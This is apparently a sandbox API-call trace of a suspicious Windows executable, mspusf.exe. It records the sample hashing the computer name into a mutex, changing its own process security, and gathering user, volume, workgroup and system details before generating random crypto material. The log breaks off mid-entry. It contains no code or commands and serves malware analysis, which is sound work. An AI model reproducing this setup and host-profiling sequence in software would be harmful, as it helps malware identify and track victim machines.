# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 26.06.2020 15:33:32.018 Process: id = "1" image_name = "mspusf.exe" filename = "c:\\users\\fd1hvy\\desktop\\mspusf.exe" page_root = "0x12291000" os_pid = "0xf00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x560" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\mspusf.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xf04 [0058.378] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x756e0000 [0058.378] GetProcAddress (hModule=0x756e0000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x756f8d40 [0058.378] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0058.452] GetCurrentProcess () returned 0xffffffff [0058.452] SetKernelObjectSecurity (Handle=0xffffffff, SecurityInformation=0x4, SecurityDescriptor=0xe4d448) returned 1 [0058.453] GetProcessHeap () returned 0xe30000 [0058.453] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x184) returned 0xe41100 [0058.453] GetComputerNameA (in: lpBuffer=0xe41100, nSize=0x95ff00 | out: lpBuffer="NQDPDE", nSize=0x95ff00) returned 1 [0058.453] CryptAcquireContextA (in: phProv=0x95fb68, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x95fb68*=0xe366e0) returned 1 [0058.930] CryptCreateHash (in: hProv=0xe366e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x95fb6c | out: phHash=0x95fb6c) returned 1 [0058.930] CryptHashData (hHash=0xe4a120, pbData=0xe41100, dwDataLen=0x6, dwFlags=0x0) returned 1 [0058.930] CryptGetHashParam (in: hHash=0xe4a120, dwParam=0x4, pbData=0x95fb64, pdwDataLen=0x95fb60, dwFlags=0x0 | out: pbData=0x95fb64, pdwDataLen=0x95fb60) returned 1 [0058.930] CryptGetHashParam (in: hHash=0xe4a120, dwParam=0x2, pbData=0x95fd94, pdwDataLen=0x95fb64, dwFlags=0x0 | out: pbData=0x95fd94, pdwDataLen=0x95fb64) returned 1 [0058.930] CryptDestroyHash (hHash=0xe4a120) returned 1 [0058.931] CryptReleaseContext (hProv=0xe366e0, dwFlags=0x0) returned 1 [0058.931] StringFromGUID2 (in: rguid=0x95fd94*(Data1=0x5dc7d478, Data2=0x7e59, Data3=0xa370, Data4=([0]=0x11, [1]=0xd2, [2]=0x2b, [3]=0xf9, [4]=0xcf, [5]=0xe4, [6]=0x72, [7]=0xd4)), lpsz=0x95fb8c, cchMax=260 | out: lpsz="{5DC7D478-7E59-A370-11D2-2BF9CFE472D4}") returned 39 [0058.931] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{5DC7D478-7E59-A370-11D2-2BF9CFE472D4}") returned 0x248 [0058.931] GetLastError () returned 0x0 [0058.931] GetTickCount () returned 0x1150387 [0058.931] GetSystemInfo (in: lpSystemInfo=0x95feb4 | out: lpSystemInfo=0x95feb4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0058.931] GetCurrentProcessId () returned 0xf00 [0058.931] GetLastError () returned 0x0 [0058.931] lstrlenA (lpString="Started (PID: %u; Workers: %u) [%s]\n") returned 36 [0058.931] GetProcessHeap () returned 0xe30000 [0058.931] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2a5) returned 0xe518f8 [0058.933] wvnsprintfA (in: pszDest=0xe518f8, cchDest=548, pszFmt="Started (PID: %u; Workers: %u) [%s]\n", arglist=0x95fe74 | out: pszDest="Started (PID: 3840; Workers: 4) [NQDPDE]\n") returned 41 [0058.933] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0058.933] WriteFile (in: hFile=0x90, lpBuffer=0xe518f8*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x95fe5c, lpOverlapped=0x0 | out: lpBuffer=0xe518f8*, lpNumberOfBytesWritten=0x95fe5c*=0x29, lpOverlapped=0x0) returned 1 [0058.940] FlushFileBuffers (hFile=0x90) returned 0 [0058.950] GetProcessHeap () returned 0xe30000 [0058.950] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe518f8 | out: hHeap=0xe30000) returned 1 [0058.950] SetLastError (dwErrCode=0x0) [0058.950] GetCurrentProcess () returned 0xffffffff [0058.950] SetProcessPriorityBoost (hProcess=0xffffffff, bDisablePriorityBoost=0) returned 1 [0058.950] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x831000, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x95fee8 | out: lpThreadId=0x95fee8*=0x798) returned 0x274 [0058.951] CloseHandle (hObject=0x274) returned 1 [0058.951] GetTickCount () returned 0x1150396 [0058.951] GetProcessHeap () returned 0xe30000 [0058.951] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2080) returned 0xe52f58 [0058.951] RegQueryValueExA (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0xe52f58, lpcbData=0x95e87c*=0x2000 | out: lpType=0x0, lpData=0xe52f58*=0x50, lpcbData=0x95e87c*=0x3d8) returned 0x0 [0059.180] GetProcessHeap () returned 0xe30000 [0059.180] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe52f58 | out: hHeap=0xe30000) returned 1 [0059.180] GetTickCount () returned 0x1150481 [0059.180] GetSystemTimes (in: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4 | out: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4) returned 1 [0059.180] GetCurrentProcess () returned 0xffffffff [0059.180] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4 | out: lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4) returned 1 [0059.180] GetCurrentProcessId () returned 0xf00 [0059.180] GetCurrentThreadId () returned 0xf04 [0059.180] GetCurrentProcess () returned 0xffffffff [0059.180] GetCurrentThread () returned 0xfffffffe [0059.180] GetCurrentProcess () returned 0xffffffff [0059.180] GetProcessHandleCount (in: hProcess=0xffffffff, pdwHandleCount=0x859c2c | out: pdwHandleCount=0x859c2c) returned 1 [0059.180] GetSystemInfo (in: lpSystemInfo=0x859c30 | out: lpSystemInfo=0x859c30*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0059.180] GetEnvironmentVariableA (in: lpName="SystemDrive", lpBuffer=0x95e784, nSize=0x104 | out: lpBuffer="C:") returned 0x2 [0059.181] PathAddBackslashA (in: pszPath="C:" | out: pszPath="C:\\") returned="" [0059.181] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x859c0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x859c0c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0059.181] GetProcessHeap () returned 0xe30000 [0059.181] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x184) returned 0xe4fe90 [0059.181] GetUserNameA (in: lpBuffer=0xe4fe90, pcbBuffer=0x95e884 | out: lpBuffer="FD1HVy", pcbBuffer=0x95e884) returned 1 [0059.185] GetProcessHeap () returned 0xe30000 [0059.185] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe4fe90 | out: hHeap=0xe30000) returned 1 [0059.185] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x95e784, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\mspusf.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\mspusf.exe")) returned 0x22 [0059.185] PathFindFileNameA (pszPath="C:\\Users\\FD1HVy\\Desktop\\mspusf.exe") returned="mspusf.exe" [0059.186] GetNativeSystemInfo (in: lpSystemInfo=0x95e898 | out: lpSystemInfo=0x95e898*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0059.186] GetCurrentProcess () returned 0xffffffff [0059.186] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x95e8c4 | out: TokenHandle=0x95e8c4*=0x3c0) returned 1 [0059.186] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0xc, TokenInformation=0x95e8c0, TokenInformationLength=0x4, ReturnLength=0x95e8bc | out: TokenInformation=0x95e8c0, ReturnLength=0x95e8bc) returned 1 [0059.186] CloseHandle (hObject=0x3c0) returned 1 [0059.186] NetServerGetInfo (in: servername=0x0, level=0x65, bufptr=0x95e87c | out: bufptr=0x95e87c) returned 0x0 [0059.218] NetWkstaGetInfo (in: servername=0x0, level=0x64, bufptr=0x95e880 | out: bufptr=0x95e880) returned 0x0 [0059.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WORKGROUP", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0059.476] GetProcessHeap () returned 0xe30000 [0059.476] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x94) returned 0xe3e860 [0059.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WORKGROUP", cchWideChar=-1, lpMultiByteStr=0xe3e860, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WORKGROUP", lpUsedDefaultChar=0x0) returned 10 [0059.477] NetApiBufferFree (Buffer=0xe4e7f8) returned 0x0 [0059.477] NetApiBufferFree (Buffer=0xe43830) returned 0x0 [0059.477] lstrcpynA (in: lpString1=0x859c9c, lpString2="WORKGROUP", iMaxLength=260 | out: lpString1="WORKGROUP") returned="WORKGROUP" [0059.477] GetTickCount () returned 0x11505a9 [0059.477] GetProcessHeap () returned 0xe30000 [0059.477] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2080) returned 0xe9b2c0 [0059.477] RegQueryValueExA (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0xe9b2c0, lpcbData=0x95e8bc*=0x2000 | out: lpType=0x0, lpData=0xe9b2c0*=0x50, lpcbData=0x95e8bc*=0x3d8) returned 0x0 [0059.483] GetProcessHeap () returned 0xe30000 [0059.483] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b2c0 | out: hHeap=0xe30000) returned 1 [0059.483] GetTickCount () returned 0x11505a9 [0059.483] GetSystemTimes (in: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4 | out: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4) returned 1 [0059.483] GetCurrentProcess () returned 0xffffffff [0059.483] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4 | out: lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4) returned 1 [0059.483] CryptAcquireContextA (in: phProv=0x95e8b8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x95e8b8*=0xe366e0) returned 1 [0059.487] CryptCreateHash (in: hProv=0xe366e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x95e8bc | out: phHash=0x95e8bc) returned 1 [0059.487] CryptHashData (hHash=0xe4a120, pbData=0x859c10, dwDataLen=0x1cc, dwFlags=0x0) returned 1 [0059.487] CryptGetHashParam (in: hHash=0xe4a120, dwParam=0x4, pbData=0x95e8b4, pdwDataLen=0x95e8b0, dwFlags=0x0 | out: pbData=0x95e8b4, pdwDataLen=0x95e8b0) returned 1 [0059.487] CryptGetHashParam (in: hHash=0xe4a120, dwParam=0x2, pbData=0x95e8d8, pdwDataLen=0x95e8b4, dwFlags=0x0 | out: pbData=0x95e8d8, pdwDataLen=0x95e8b4) returned 1 [0059.487] CryptDestroyHash (hHash=0xe4a120) returned 1 [0059.487] CryptReleaseContext (hProv=0xe366e0, dwFlags=0x0) returned 1 [0059.487] GetProcessHeap () returned 0xe30000 [0059.487] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x184) returned 0xe564b0 [0059.487] wnsprintfA (in: pszDest=0xe564b0, cchDest=4, pszFmt="%02x" | out: pszDest="38") returned 2 [0059.487] wnsprintfA (in: pszDest=0xe564b2, cchDest=4, pszFmt="%02x" | out: pszDest="cc") returned 2 [0059.487] wnsprintfA (in: pszDest=0xe564b4, cchDest=4, pszFmt="%02x" | out: pszDest="23") returned 2 [0059.487] wnsprintfA (in: pszDest=0xe564b6, cchDest=4, pszFmt="%02x" | out: pszDest="a7") returned 2 [0059.487] wnsprintfA (in: pszDest=0xe564b8, cchDest=4, pszFmt="%02x" | out: pszDest="a0") returned 2 [0059.488] wnsprintfA (in: pszDest=0xe564ba, cchDest=4, pszFmt="%02x" | out: pszDest="b6") returned 2 [0059.488] wnsprintfA (in: pszDest=0xe564bc, cchDest=4, pszFmt="%02x" | out: pszDest="85") returned 2 [0059.488] wnsprintfA (in: pszDest=0xe564be, cchDest=4, pszFmt="%02x" | out: pszDest="98") returned 2 [0059.488] wnsprintfA (in: pszDest=0xe564c0, cchDest=4, pszFmt="%02x" | out: pszDest="c4") returned 2 [0059.488] wnsprintfA (in: pszDest=0xe564c2, cchDest=4, pszFmt="%02x" | out: pszDest="d1") returned 2 [0059.488] wnsprintfA (in: pszDest=0xe564c4, cchDest=4, pszFmt="%02x" | out: pszDest="32") returned 2 [0059.488] wnsprintfA (in: pszDest=0xe564c6, cchDest=4, pszFmt="%02x" | out: pszDest="39") returned 2 [0059.488] wnsprintfA (in: pszDest=0xe564c8, cchDest=4, pszFmt="%02x" | out: pszDest="d0") returned 2 [0059.488] wnsprintfA (in: pszDest=0xe564ca, cchDest=4, pszFmt="%02x" | out: pszDest="99") returned 2 [0059.488] wnsprintfA (in: pszDest=0xe564cc, cchDest=4, pszFmt="%02x" | out: pszDest="c9") returned 2 [0059.488] wnsprintfA (in: pszDest=0xe564ce, cchDest=4, pszFmt="%02x" | out: pszDest="09") returned 2 [0059.489] CryptAcquireContextW (in: phProv=0x95e63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x95e63c*=0xe366e0) returned 1 [0059.490] CryptGenRandom (in: hProv=0xe366e0, dwLen=0x80, pbBuffer=0x95e650 | out: pbBuffer=0x95e650) returned 1 [0059.490] CryptReleaseContext (hProv=0xe366e0, dwFlags=0x0) returned 1 [0059.490] GetProcessHeap () returned 0xe30000 [0059.490] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xe505f0 [0059.490] GetProcessHeap () returned 0xe30000 [0059.490] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0xe36f68 [0059.491] GetProcessHeap () returned 0xe30000 [0059.491] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xe9b2c0 [0059.491] GetProcessHeap () returned 0xe30000 [0059.491] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0xe9b548 [0059.491] GetProcessHeap () returned 0xe30000 [0059.491] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b2c0 | out: hHeap=0xe30000) returned 1 [0059.491] GetProcessHeap () returned 0xe30000 [0059.491] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0xe9b7d8 [0059.491] GetProcessHeap () returned 0xe30000 [0059.491] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x488) returned 0xe9ba68 [0059.491] GetProcessHeap () returned 0xe30000 [0059.491] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0xe3e578 [0059.491] GetProcessHeap () returned 0xe30000 [0059.491] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xe9bef8 [0059.491] GetProcessHeap () returned 0xe30000 [0059.491] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.491] GetProcessHeap () returned 0xe30000 [0059.491] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xe9c388 [0059.491] GetProcessHeap () returned 0xe30000 [0059.491] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xe9b2c0 [0059.491] GetProcessHeap () returned 0xe30000 [0059.491] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48c) returned 0xe9c818 [0059.491] GetProcessHeap () returned 0xe30000 [0059.491] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe3e578 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe36eb8 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0xe9ccb0 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b2c0 | out: hHeap=0xe30000) returned 1 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xe9cf40 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9ccb0 | out: hHeap=0xe30000) returned 1 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe56640 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe3fac0 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe56640 | out: hHeap=0xe30000) returned 1 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe3e578 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x288) returned 0xe9ccb0 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3fac0 | out: hHeap=0xe30000) returned 1 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xe9d3d0 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9ccb0 | out: hHeap=0xe30000) returned 1 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe3e578 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.492] GetProcessHeap () returned 0xe30000 [0059.492] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe3e578 [0059.492] GetProcessHeap () returned 0xe30000 [0059.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe3e578 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe3e578 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe3e578 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe3e578 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe3e578 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe3e578 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe3e578 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe3e578 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe3e578 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.493] GetProcessHeap () returned 0xe30000 [0059.493] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe3e578 [0059.493] GetProcessHeap () returned 0xe30000 [0059.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe3e578 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe3e578 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe3e578 | out: hHeap=0xe30000) returned 1 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0059.494] GetProcessHeap () returned 0xe30000 [0059.494] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0059.494] GetProcessHeap () returned 0xe30000 [0059.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0059.495] GetProcessHeap () returned 0xe30000 [0059.495] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dac8 [0059.495] GetProcessHeap () returned 